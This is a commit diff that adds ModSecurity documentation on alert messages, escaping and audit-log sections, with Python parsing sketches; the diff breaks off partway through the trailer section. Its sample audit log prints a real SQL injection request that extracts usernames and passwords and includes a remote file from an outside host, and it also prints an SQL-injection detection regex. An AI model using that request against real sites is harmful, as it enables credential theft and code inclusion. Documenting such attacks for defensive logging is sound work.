Add the data formats documentation.

2026-01-16 08:27:10 +03:00 · 2008-12-01 10:39:46 +00:00
parent facacae238
commit fd5cf18ca4
1 changed files with 972 additions and 0 deletions
--- a/doc/modsecurity2-data-formats.xml
+++ b/doc/modsecurity2-data-formats.xml
@@ -0,0 +1,972 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN"
+                         "http://www.docbook.org/xml/4.4/docbookx.dtd">
+<article>
+    <title>ModSecurity 2 Data Formats</title>
+    <articleinfo>
+        <releaseinfo>Version 2.6.0-trunk (November 27, 2008)</releaseinfo>
+        <copyright>
+            <year>2004-2008</year>
+            <holder>Breach Security, Inc. (<ulink url="http://www.breach.com"
+                    >http://www.breach.com</ulink>)</holder>
+        </copyright>
+    </articleinfo>
+    <para>This document describes the formats of the ModSecurity alert messages, transaction logs
+        and communication protocols. Knowing these formats makes it easier to understand what
+        ModSecurity does and to integrate it with third-party tools and products.</para>
+    <section>
+        <title>Alerts</title>
+        <para>As part of its operations ModSecurity will emit alerts, which are either
+                <emphasis>warnings</emphasis> (non-fatal) or <emphasis>errors</emphasis> (fatal,
+            usually leading to the interception of the transaction in question). Below is an example
+            of a ModSecurity alert entry:</para>
+        <programlisting>Access denied with code 505 (phase 1). Match of "rx
+  ^HTTP/(0\\\\.9|1\\\\.[01])$" against "REQUEST_PROTOCOL" required.
+  [id "960034"] [msg "HTTP protocol version is not allowed by policy"]
+  [severity "CRITICAL"] [uri "/"] [unique_id "PQaTTVBEUOkAAFwKXrYAAAAM"]</programlisting>
+        <note>
+            <para>Alerts will only ever contain one line of text but we've broken the above example
+                into multiple lines to make it fit into the page.</para>
+        </note>
+        <para>Each alert entry begins with the engine message, which describes what ModSecurity did
+            and why. For
+            example:<programlisting>Access denied with code 505 (phase 1). Match of "rx
+  ^HTTP/(0\\\\.9|1\\\\.[01])$" against "REQUEST_PROTOCOL" required.</programlisting></para>
+        <section>
+            <title>Alert Action Description</title>
+            <para>The first part of the engine message tells you whether ModSecurity acted to
+                interrupt transaction or rule processing:</para>
+            <orderedlist>
+                <listitem>
+                    <para>If the alert is only a warning, the first sentence will simply say
+                            <emphasis>Warning</emphasis>.</para>
+                </listitem>
+                <listitem>
+                    <para>If the transaction was intercepted, the first sentence will begin with
+                            <emphasis>Access denied</emphasis>. What follows is the list of possible
+                        messages related to transaction interception:</para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Access denied with code %0</emphasis> - a response with
+                                status code <literal>%0</literal> was sent.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access denied with connection close</emphasis> -
+                                connection was abruptly closed.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access denied with redirection to %0 using status
+                                    %1</emphasis> - a redirection to URI <literal>%0</literal> was
+                                issued using status <literal>%1</literal>.</para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para>There is also a special message that ModSecurity emits when an <literal
+                            >allow</literal> action is executed. There are three variations of this
+                        type of message:</para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Access allowed</emphasis> - rule engine stopped
+                                processing rules (transaction was unaffected).</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access to phase allowed</emphasis> - rule engine stopped
+                                processing rules in the current phase only. Subsequent phases will
+                                be processed normally. Transaction was not affected by this rule but
+                                it may be affected by any of the rules in the subsequent
+                                phase.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access to request allowed</emphasis> - rule engine
+                                stopped processing rules in the current phase. Phases prior to
+                                request execution in the backend (currently phases 1 and 2) will not
+                                be processed. The response phases (currently phases 3 and 4) and
+                                others (currently phase 5) will be processed as normal. Transaction
+                                was not affected by this rule but it may be affected by any of the
+                                rules in the subsequent phase.</para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+            </orderedlist>
+        </section>
+        <section>
+            <title>Alert Justification Description</title>
+            <para>The second part of the engine message explains <emphasis>why</emphasis> the alert
+                was generated. Because it is generated automatically from the rules, it is very
+                technical in nature: it refers to operators and their parameters and gives you
+                insight into what the rule looked like. It cannot, however, give you insight
+                into the reasoning behind the rule. A well-written rule will always specify a
+                human-readable message (using the <literal>msg</literal> action) to provide further
+                information.</para>
+            <para>The format of the second part of the engine message depends on whether it was
+                generated by the operator (which happens on a match) or by the rule processor (which
+                happens when there is no match but negation was used). The operators generate the
+                following messages:</para>
+            <itemizedlist>
+                <listitem>
+                    <para><literal>@beginsWith</literal> - <emphasis>String match %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@contains</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@containsWord</literal> - <emphasis>String match %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@endsWith</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@eq</literal> - <emphasis>Operator EQ matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@ge</literal> - <emphasis>Operator GE matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@geoLookup</literal> - <emphasis>Geo lookup for %0 succeeded at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@inspectFile</literal> - <emphasis>File %0 rejected by the
+                            approver script %1: %2</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@le</literal> - <emphasis>Operator LE matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@lt</literal> - <emphasis>Operator LT matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@rbl</literal> - <emphasis>RBL lookup of %0 succeeded at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@rx</literal> - <emphasis>Pattern match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@streq</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateByteRange</literal> - <emphasis>Found %0 byte(s) in %1
+                            outside range: %2.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateDTD</literal> - <emphasis>XML: DTD validation
+                            failed.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateSchema</literal> - <emphasis>XML: Schema validation
+                            failed.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateUrlEncoding</literal></para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Invalid URL Encoding: Non-hexadecimal digits used at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid URL Encoding: Not enough characters at the end
+                                    of input at %0.</emphasis></para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateUtf8Encoding</literal></para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: not enough bytes in character at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: invalid byte value in character
+                                    at %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: overlong character detected at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: use of restricted character at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: decoding error at
+                                %0.</emphasis></para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para><literal>@verifyCC</literal> - <emphasis>CC# match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+            </itemizedlist>
+            <para>Messages not related to operators:</para>
+            <itemizedlist>
+                <listitem>
+                    <para>When <literal>SecAction</literal> directive is processed -
+                            <emphasis>Unconditional match in SecAction.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para>When <literal>SecRule</literal> does not match but negation is used -
+                            <emphasis>Match of %0 against %1 required.</emphasis></para>
+                </listitem>
+            </itemizedlist>
+            <note>
+                <para>The parameters to the operators <literal>@rx</literal> and <literal
+                        >@pm</literal> (regular expression and text pattern, respectively) will be
+                    truncated to 252 bytes if they are longer than this limit. In this case the
+                    parameter in the alert message will be terminated with three dots.</para>
+            </note>
+        </section>
+        <section>
+            <title>Meta-data</title>
+            <para>The metadata fields are always placed at the end of the alert entry. Each metadata
+                field is a text fragment that consists of an opening bracket, the metadata field
+                name, a space, the value in double quotes and a closing bracket. What follows is the
+                text fragment that makes up the <literal>id</literal> metadata field.</para>
+            <programlisting>[id "960034"]</programlisting>
+            <para>The following metadata fields are currently used:</para>
+            <orderedlist>
+                <listitem>
+                    <para><literal>offset</literal> - The byte offset where a match occurred within
+                        the target data. This is not always available.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>id</literal> - Unique rule ID, as specified by the <literal
+                            >id</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>rev</literal> - Rule revision, as specified by the <literal
+                            >rev</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>msg</literal> - Human-readable message, as specified by the
+                            <literal>msg</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>severity</literal> - Event severity as text, as specified by the
+                            <literal>severity</literal> action. The possible values (with their
+                        corresponding numerical values in brackets) are <literal
+                            >EMERGENCY</literal> (0), <literal>ALERT</literal> (1), <literal
+                            >CRITICAL</literal> (2), <literal>ERROR</literal> (3), <literal
+                            >WARNING</literal> (4), <literal>NOTICE</literal> (5), <literal
+                            >INFO</literal> (6) and <literal>DEBUG</literal> (7).</para>
+                </listitem>
+                <listitem>
+                    <para><literal>unique_id</literal> - Unique event ID, generated
+                        automatically.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>uri</literal> - Request URI.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>logdata</literal> - contains transaction data fragment, as
+                        specified by the <literal>logdata</literal> action.</para>
+                </listitem>
+            </orderedlist>
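+            <para>The field format described above lends itself to simple pattern matching. The
+                following Python sketch separates the engine message from the trailing metadata
+                fields. The function name <literal>parse_alert_metadata</literal> and the regular
+                expression are illustrative assumptions and are not part of ModSecurity. The
+                sketch treats the first thing that looks like a field as the start of the
+                metadata, so an engine message that itself contains such a fragment would be
+                split too early.</para>
+            <programlisting><![CDATA[
```python
import re

# One metadata field: [name "value"], where the value may contain
# backslash-escaped characters such as \" or \\.
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')


def parse_alert_metadata(alert):
    """Return (engine_message, fields) for a single-line alert entry."""
    matches = list(FIELD_RE.finditer(alert))
    if not matches:
        return alert.strip(), []
    # Everything before the first field is taken to be the engine message.
    engine_message = alert[:matches[0].start()].strip()
    # A list of pairs keeps the original order and tolerates repeated names.
    fields = [(m.group(1), m.group(2)) for m in matches]
    return engine_message, fields


# The example alert from this document, joined back into one line.
alert = ('Access denied with code 505 (phase 1). Match of "rx '
         '^HTTP/(0\\\\.9|1\\\\.[01])$" against "REQUEST_PROTOCOL" required. '
         '[id "960034"] [msg "HTTP protocol version is not allowed by policy"] '
         '[severity "CRITICAL"] [uri "/"] [unique_id "PQaTTVBEUOkAAFwKXrYAAAAM"]')
message, fields = parse_alert_metadata(alert)
```
+]]></programlisting>
+            <para>Field values are returned still escaped; decoding them is a separate
+                step.</para>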
+        </section>
+        <section>
+            <title>Escaping</title>
+            <para>ModSecurity alerts will always contain text fragments that were taken from
+                configuration or the transaction. Such text fragments are escaped before they are
+                used in messages, in order to sanitise the potentially dangerous characters. They
+                are also sometimes surrounded with double quotes. The escaping algorithm is as
+                    follows:<orderedlist>
+                    <listitem>
+                        <para>Characters <literal>0x08</literal> (<literal>BACKSPACE</literal>),
+                                <literal>0x0a</literal> (<literal>NEWLINE</literal>), <literal
+                                >0x0d</literal> (<literal>CARRIAGE RETURN</literal>), <literal
+                                >0x09</literal> (<literal>HORIZONTAL TAB</literal>) and <literal
+                                >0x0b</literal> (<literal>VERTICAL TAB</literal>) will be
+                            represented as <literal>\b</literal>, <literal>\n</literal>, <literal
+                                >\r</literal>, <literal>\t</literal> and <literal>\v</literal>,
+                            respectively.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Any remaining bytes from the ranges <literal>0-0x1f</literal> and <literal
+                                >0x7f-0xff</literal> (inclusive) will be represented as <literal
+                                >\xHH</literal>, where <literal>HH</literal> is the hexadecimal
+                            value of the byte.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Backslash characters (<literal>\</literal>) will be represented as
+                                <literal>\\</literal>.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Each double quote character will be represented as <literal
+                                >\"</literal>, but only if the entire fragment is surrounded with
+                            double quotes.</para>
+                    </listitem>
+                </orderedlist></para>
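+            <para>The four rules above can be sketched in Python as follows. This is an
+                illustration of the rules as described, not the code ModSecurity uses. The function
+                name <literal>escape_fragment</literal>, the <literal>quoted</literal> parameter and
+                the use of lowercase hexadecimal digits are assumptions, and carriage return is
+                taken to be byte <literal>0x0d</literal>.</para>
+            <programlisting><![CDATA[
```python
# Named escapes from the first rule (carriage return assumed to be 0x0d).
NAMED = {0x08: "\\b", 0x0A: "\\n", 0x0D: "\\r", 0x09: "\\t", 0x0B: "\\v"}


def escape_fragment(data, quoted=False):
    """Escape a bytes fragment following the four rules described above."""
    out = []
    for byte in data:
        if byte in NAMED:
            out.append(NAMED[byte])
        elif byte <= 0x1F or byte >= 0x7F:
            # Remaining control bytes and bytes 0x7f-0xff become \xHH.
            out.append("\\x%02x" % byte)
        elif byte == 0x5C:
            # A backslash is doubled.
            out.append("\\\\")
        elif byte == 0x22 and quoted:
            # A double quote is escaped only inside a quoted fragment.
            out.append('\\"')
        else:
            out.append(chr(byte))
    text = "".join(out)
    return '"' + text + '"' if quoted else text
```
+]]></programlisting>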
+        </section>
+        <section>
+            <title>Alerts in the Apache Error Log</title>
+            <para>Every ModSecurity alert conforms to the following format when it appears in the
+                Apache error log:</para>
+            <programlisting>[Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1]
+            ModSecurity: ALERT_MESSAGE</programlisting>
+            <para>The above is a standard Apache error log format. The <literal>ModSecurity:
+                </literal> prefix is specific to ModSecurity. It is used to allow quick
+                identification of ModSecurity alert messages when they appear in the same file next
+                to other Apache messages.</para>
+            <para>The actual message (<literal>ALERT_MESSAGE</literal> in the example above) is in
+                the same format as described in the <emphasis>Alerts</emphasis> section.</para>
+            <note>
+                <para>Apache further escapes ModSecurity alert messages before writing them to the
+                    error log. This means that all backslash characters will be doubled in the error
+                    log. In practice, since ModSecurity will already represent a single backslash
+                    within an untrusted text fragment as two backslashes, the end result in the
+                    Apache error log will be <emphasis>four</emphasis> backslashes. Thus, if you
+                    need to interpret a ModSecurity message from the error log, you should decode
+                    the message part after the <literal>ModSecurity:</literal> prefix first. This
+                    step will peel the first encoding layer.</para>
+            </note>
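+            <para>As a rough illustration of the note above, the Python sketch below extracts the
+                alert message from an error log line and undoes the backslash doubling. The function
+                name <literal>alert_from_error_log</literal> is hypothetical. The sketch assumes
+                that backslash doubling is the only encoding that needs to be peeled; any other
+                escapes Apache may apply are left untouched.</para>
+            <programlisting><![CDATA[
```python
PREFIX = "ModSecurity: "


def alert_from_error_log(line):
    """Return the alert message from an Apache error log line, or None."""
    _, found, message = line.partition(PREFIX)
    if not found:
        return None  # not a ModSecurity entry
    # Undo only the backslash doubling; other escapes are left untouched.
    return message.rstrip("\n").replace("\\\\", "\\")


line = ('[Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1] '
        'ModSecurity: Warning. Pattern match "a\\\\\\\\.b" at ARGS:c.')
alert = alert_from_error_log(line)
```
+]]></programlisting>
+            <para>The four backslashes in the log line become two in the returned message, which is
+                the form described in the <emphasis>Escaping</emphasis> section.</para>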
+        </section>
+        <section>
+            <title>Alerts in Audit Logs</title>
+            <para>Alerts are transported in the <literal>H</literal> section of the ModSecurity
+                Audit Log. Alerts will appear each on a separate line and in the order they were
+                generated by ModSecurity. Each line will be in the following format:</para>
+            <programlisting>Message: ALERT_MESSAGE</programlisting>
+            <para>Below is an example of an <literal>H</literal> section that contains two alert
+                messages:</para>
+            <programlisting>--c7036611-H--
+Message: Warning. Match of "rx ^apache.*perl" against
+  "REQUEST_HEADERS:User-Agent" required. [id "990011"] [msg "Request
+  Indicates an automated program explored the site"] [severity "NOTICE"]
+Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b
+  (?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)
+  |.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
+  (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|
+  makewebt ..." at ARGS:c. [id "950001"] [msg "SQL Injection Attack.
+  Matched signature: union select"] [severity "CRITICAL"]
+Stopwatch: 1199881676978327 2514 (396 2224 -)
+Producer: ModSecurity v2.x.x (Apache 2.x)
+Server: Apache/2.x.x
+
+--c7036611-Z--</programlisting>
+        </section>
+    </section>
+    <section>
+        <title>Audit Log</title>
+        <para>ModSecurity records one transaction in a single audit log file. Below is an
+            example:</para>
+        <programlisting>--c7036611-A--
+[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995
+  80.68.80.233 80
+--c7036611-B--
+GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,
+  char(77),password,char(77),email_address,char(77),info,char(77),user_level,
+  char(77))/**/from/**/eb_members/**/where/**/userid=1/*http://kamloopstutor.
+  com/images/banners/on.txt? HTTP/1.1
+TE: deflate,gzip;q=0.3
+Connection: TE, close
+Host: www.example.com
+User-Agent: libwww-perl/5.808
+
+--c7036611-F--
+HTTP/1.1 404 Not Found
+Content-Length: 223
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+
+--c7036611-H--
+Message: Warning. Match of "rx ^apache.*perl" against
+  "REQUEST_HEADERS:User-Agent" required. [id "990011"] [msg "Request
+  Indicates an automated program explored the site"] [severity "NOTICE"]
+Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b
+  (?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)
+  |.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
+  (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|
+  makewebt ..." at ARGS:c. [id "950001"] [msg "SQL Injection Attack.
+  Matched signature: union select"] [severity "CRITICAL"]
+Stopwatch: 1199881676978327 2514 (396 2224 -)
+Producer: ModSecurity v2.x.x (Apache 2.x)
+Server: Apache/2.x.x
+
+--c7036611-Z--
+</programlisting>
+        <para>The file consists of multiple sections, each in a different format. Separators are
+            used to define sections:</para>
+        <programlisting>--c7036611-A--</programlisting>
+        <para>A separator always begins on a new line and conforms to the following format:</para>
+        <orderedlist>
+            <listitem>
+                <para>Two dashes</para>
+            </listitem>
+            <listitem>
+                <para>Unique boundary, which consists of several hexadecimal characters.</para>
+            </listitem>
+            <listitem>
+                <para>One dash character.</para>
+            </listitem>
+            <listitem>
+                <para>Section identifier, currently a single uppercase letter.</para>
+            </listitem>
+            <listitem>
+                <para>Two trailing dashes.</para>
+            </listitem>
+        </orderedlist>
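+        <para>The separator format listed above can be matched with a single regular expression. The
+            following Python sketch uses it to split one audit log entry into its parts. The names
+                <literal>SEPARATOR_RE</literal> and <literal>split_parts</literal> are illustrative,
+            and the entry shown is an abbreviated, made-up example. A body line that happens to look
+            like a separator would be misread; a stricter parser could also check that the boundary
+            matches the one seen in the first separator.</para>
+        <programlisting><![CDATA[
```python
import re

# Two dashes, hexadecimal boundary, one dash, uppercase letter, two dashes.
SEPARATOR_RE = re.compile(r"^--([0-9a-fA-F]+)-([A-Z])--$")


def split_parts(entry):
    """Map each section identifier to the list of lines in that section."""
    parts = {}
    current = None
    for line in entry.splitlines():
        match = SEPARATOR_RE.match(line)
        if match:
            current = match.group(2)
            parts[current] = []
        elif current is not None:
            parts[current].append(line)
    return parts


entry = """--c7036611-A--
[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995 80.68.80.233 80
--c7036611-B--
GET / HTTP/1.1
Host: www.example.com

--c7036611-Z--
"""
parts = split_parts(entry)
```
+]]></programlisting>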
+        <para>Refer to the documentation for <literal>SecAuditLogParts</literal> for the explanation
+            of each part.</para>
+        <section>
+            <title>Parts</title>
+            <para>This section documents the audit log parts available in ModSecurity 2.x. They are: <itemizedlist>
+                    <listitem>
+                        <para><literal moreinfo="none">A</literal> - audit log header</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">B</literal> - request headers</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">C</literal> - request body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">D</literal> - intended response headers (NOT
+                            IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">E</literal> - intended response body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">F</literal> - response headers</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">G</literal> - response body (NOT
+                            IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">H</literal> - audit log trailer</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">I</literal> - reduced multipart request
+                            body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">J</literal> - multipart files information
+                            (NOT IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">K</literal> - matched rules
+                            information</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">Z</literal> - audit log footer</para>
+                    </listitem>
+                </itemizedlist></para>
+            <section>
+                <title>Audit Log Header (<literal>A</literal>)</title>
+                <para>ModSecurity 2.x audit log entries always begin with the header part. For
+                    example:</para>
+                <programlisting>--c7036611-A--
+[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995
+  80.68.80.233 80</programlisting>
+                <para>The header contains only one line, with the following information on
+                    it:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Timestamp</para>
+                    </listitem>
+                    <listitem>
+                        <para>Unique transaction ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source IP address (IPv4)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source port</para>
+                    </listitem>
+                    <listitem>
+                        <para>Destination IP address (IPv4)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Destination port</para>
+                    </listitem>
+                </orderedlist>
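+                <para>A minimal Python sketch of reading these six fields is shown below. It assumes
+                    that the header is a single line with fields separated by single spaces (the
+                    example above is wrapped only to fit the page) and that the timestamp uses the
+                    layout seen in that example. The function name <literal>parse_header</literal>
+                    and the dictionary keys are hypothetical.</para>
+                <programlisting><![CDATA[
```python
import re
from datetime import datetime

# [timestamp] transaction-id source-ip source-port dest-ip dest-port
HEADER_RE = re.compile(r"^\[([^\]]+)\] (\S+) (\S+) (\d+) (\S+) (\d+)$")


def parse_header(line):
    """Split the single header line of part A into its six fields."""
    match = HEADER_RE.match(line.strip())
    if match is None:
        raise ValueError("not an audit log header line")
    timestamp, tx_id, src_ip, src_port, dst_ip, dst_port = match.groups()
    return {
        "timestamp": datetime.strptime(timestamp, "%d/%b/%Y:%H:%M:%S %z"),
        "transaction_id": tx_id,
        "source_ip": src_ip,
        "source_port": int(src_port),
        "destination_ip": dst_ip,
        "destination_port": int(dst_port),
    }


header = parse_header(
    "[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH "
    "209.90.77.54 64995 80.68.80.233 80"
)
```
+]]></programlisting>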
+            </section>
+            <section>
+                <title>Request Headers (<literal>B</literal>)</title>
+                <para>The request headers part contains the request line and the request headers.
+                    The information present in this part is not necessarily identical to that sent
+                    by the client responsible for the transaction. ModSecurity 2.x for Apache does
+                    not have access to the raw data; it sees what Apache itself sees. While the end
+                    result may be identical to the raw request, differences are possible in some
+                    areas:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>If any of the fields are <literal>NUL</literal>-terminated, Apache
+                            will only see the content prior to the NUL.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Headers that span multiple lines (feature known as header folding)
+                            will be collapsed into a single line.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Multiple headers with the same name will be combined into a single
+                            header (as allowed by the HTTP RFC).</para>
+                    </listitem>
+                </orderedlist>
+            </section>
+            <section>
+                <title>Request Body (<literal>C</literal>)</title>
+                <para>This part contains the request body of the transaction, after dechunking and
+                    decompression (if applicable).</para>
+            </section>
+            <section>
+                <title>Intended Response Headers (<literal>D</literal>)</title>
+                <para>This part contains the status line and the response headers that would have
+                    been delivered to the client had ModSecurity not intervened. Thus this part
+                    makes sense only for transactions where ModSecurity altered the data flow. By
+                    differentiating between the intended and the final response headers, we are able
+                    to record what was internally ready for sending, but also what was actually
+                    sent.</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Intended Response Body (<literal>E</literal>)</title>
+                <para>This part contains the transaction response body (before compression and
+                    chunking, where used) that was either sent or would have been sent had
+                    ModSecurity not intervened. You can find out whether interception took place by
+                    looking at the <literal>Action</literal> header of the part <literal
+                    >H</literal>. If that header is present, and the interception took place in
+                    phase 3 or 4 then the <literal>E</literal> part contains the intended response
+                    body. Otherwise, it contains the actual response body.</para>
+                <note>
+                    <para>Once the <literal>G</literal> (actual response body) part is implemented,
+                        part <literal>E</literal> will be present only in audit logs that contain a
+                        transaction that was intercepted, and there will be no need for further
+                        analysis.</para>
+                </note>
+            </section>
+            <section>
+                <title>Response Headers (<literal>F</literal>)</title>
+                <para>This part contains the actual response headers sent to the client. Since
+                    ModSecurity 2.x for Apache does not access the raw connection data, it
+                    constructs part <literal>F</literal> out of the internal Apache data structures that hold the
+                    response headers. Some headers are generated just before they are sent and
+                    ModSecurity is not able to record those. They are the <literal>Date</literal>
+                    and <literal>Server</literal> response headers.</para>
+            </section>
+            <section>
+                <title>Response Body (<literal>G</literal>)</title>
+                <para>When implemented, this part will contain the actual response body before
+                    compression and chunking.</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Audit Log Trailer (<literal>H</literal>)</title>
+                <para>Part <literal>H</literal> contains additional transaction meta-data that was
+                    obtained from the web server or from ModSecurity itself. The part contains a
+                    number of trailer headers, which are similar to HTTP headers (without support
+                    for header folding):<orderedlist>
+                        <listitem>
+                            <para>Action</para>
+                        </listitem>
+                        <listitem>
+                            <para>Apache-Error</para>
+                        </listitem>
+                        <listitem>
+                            <para>Message</para>
+                        </listitem>
+                        <listitem>
+                            <para>Producer</para>
+                        </listitem>
+                        <listitem>
+                            <para>Response-Body-Transformed</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Args</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Request-Headers</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Response-Headers</para>
+                        </listitem>
+                        <listitem>
+                            <para>Server</para>
+                        </listitem>
+                        <listitem>
+                            <para>Stopwatch</para>
+                        </listitem>
+                        <listitem>
+                            <para>WebApp-Info</para>
+                        </listitem>
+                    </orderedlist></para>
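+                <para>As an illustration only, the sketch below (written in Python, which is not
+                    part of ModSecurity) shows one way a third-party tool might read the trailer
+                    headers. The function name <literal>parse_trailer</literal> and the sample
+                    input are hypothetical. The code assumes that every header occupies exactly
+                    one line and that the header name ends at the first colon:</para>

```python
from collections import defaultdict


def parse_trailer(part_h: str) -> dict:
    """Map each trailer header name to the list of values seen for it."""
    headers = defaultdict(list)
    for line in part_h.splitlines():
        # Header folding is not supported, so every header is a single line.
        name, separator, value = line.partition(":")
        if not separator:
            continue  # skip blank lines and anything that is not a header
        headers[name.strip()].append(value.strip())
    return dict(headers)


# Hypothetical sample input; a header such as Message may appear more than once.
sample = (
    "Message: Warning one.\n"
    "Message: Warning two.\n"
    "Action: Intercepted (phase 2)\n"
    "Stopwatch: 1222945098201902 2118976 (770* 4400 -)\n"
)
trailer = parse_trailer(sample)
print(trailer["Action"])
print(len(trailer["Message"]))
```

+                <para>Values are kept in lists because some headers can occur several times in
+                    the same trailer.</para>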
+                <section>
+                    <title>Action</title>
+                    <para>The <literal>Action</literal> header is present only for the transactions
+                        that were intercepted:</para>
+                    <programlisting>Action: Intercepted (phase 2)</programlisting>
+                    <para>The phase information documents the phase in which the decision to
+                        intercept took place.</para>
+                </section>
+                <section>
+                    <title>Apache-Error</title>
+                    <para>The <literal>Apache-Error</literal> header contains Apache error log messages observed by
+                        ModSecurity, excluding those sent by ModSecurity itself. For example:</para>
+                    <programlisting>Apache-Error: [file "/tmp/buildd/apache2-2.0.54/build-tree/apache2/server/
+  core.c"] [line 3505] [level 3] File does not exist: /var/www/www.
+  modsecurity.org/fst/documentation/modsecurity-apache/2.5.0-dev2</programlisting>
+                </section>
+                <section>
+                    <title>Message</title>
